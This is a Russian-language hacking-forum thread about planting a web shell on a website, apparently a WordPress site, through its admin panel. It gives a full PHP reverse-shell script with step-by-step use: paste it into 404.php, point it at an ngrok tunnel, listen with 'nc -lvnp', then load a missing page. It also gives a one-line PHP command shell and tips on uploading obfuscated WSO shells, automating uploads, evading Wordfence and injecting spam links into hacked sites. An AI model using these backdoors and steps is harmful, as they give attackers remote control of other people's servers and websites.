Например, если у вас есть доступ к админ-панели сайта, как разместить на ней веб-шелл?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как использовать веб-шелл?
- Автор темы John Kramer
- Дата начала
Смотря на какой цмс сайт, уточни это в вопросе
- Автор темы
- Добавить закладку
- #3
wordpress
Через тему, либо софтом, либо через плагин filemanager
- Автор темы
- Добавить закладку
- #5
я новичок в этом направлении поэтому у вас есть пример?
Напишу в пм
Серезно такой теперь уровень дамаги ?
Если есть доступ к pages точнее изменять исходный код страниц ты можешь отыскать страницу 404.php
и изменить ее содержимое на данный php reverse shell скрипт
PHP:
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = 'NGROK-ADDRESS';
$port = NGROKPORT;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>Запускаешь
./ngrok tcp 1337
Далее увидишь tcp-адрес + порт типо
Пример:0.tcp.eu.ngrok.io:6122
Потом вставь tcp-адрес и порт туда где я описал выше в коде далее вставляй весь php скрипт в 404.php
и запустили локально прослушиватель не закрывая окно ngrok
nc -lvnp 1337
далее в сайте после того как все сделал перейти по несуществующему разделу(это вызовит страницу 404.php что исполнит код и даст тебе оболочку)
А теперь он спроси че с ней делать !
Спасение утопюших дело рук самих утопаюших.
Разводите тут СкриптКиди !
рверс шелл, бэк конект предлогаете ему это такой стеб над ним ?
ТС подучите мат часть немного....
Спасение утопюших дело рук самих утопаюших.
Разводите тут СкриптКиди !
рверс шелл, бэк конект предлогаете ему это такой стеб над ним ?
ТС подучите мат часть немного....
PHP:
<?=system($_REQUEST[1])?>
Кстати только вспомнил, статья по теме есть у меня, но ты дал хорошую идею, можно еще про старые CVE написать.
Пока что это: https://xss.pro/threads/96611/
Пока что это: https://xss.pro/threads/96611/
Добрый день, подскажите, кто работал и устанавливал шеллы в Magento ver. 2.3.4 и WP на котором стоит worldfence. Столкнулся с проблемой, нужна парочка советов. Отпишите в лс.
Если есть доступ к админке wp сайта с полными правами, то самый простой способ - это поставить плагин для работы с файлами директорий (filemanager тот же), и уже через него в любое место залить обфусцированный код php-шелла (wso например). далее, просто по пути куда залил заходишь на веб-шелл.
для автоматизации есть как на селениуме скрипты, так и всякие zenoposter могут автоматизировать заливку.
у меня вопрос другой: как через веб-шелл залитый на wp оставить ссылку сквозную с главной или ссылку с конкретной страницы сайта через запрос php, sql или другой? или как то еще можно внедрить свой код на страницы сайта?
для автоматизации есть как на селениуме скрипты, так и всякие zenoposter могут автоматизировать заливку.
у меня вопрос другой: как через веб-шелл залитый на wp оставить ссылку сквозную с главной или ссылку с конкретной страницы сайта через запрос php, sql или другой? или как то еще можно внедрить свой код на страницы сайта?
Я шелл залил, но дальше столкнулся с проблемой открытия его.
OffTopic
Как залить шелл ?
Как открыть шелл ?
Как пльзоватся шелом ?
Что такое bash ?
Как сделать бэк конект ?
Как рутнуть сервер ?
Спасибо парни я КулХацкер
[/spiler]
Как открыть шелл ?
Как пльзоватся шелом ?
Что такое bash ?
Как сделать бэк конект ?
Как рутнуть сервер ?
Спасибо парни я КулХацкер
[/spiler]
This is DamageLab, baby!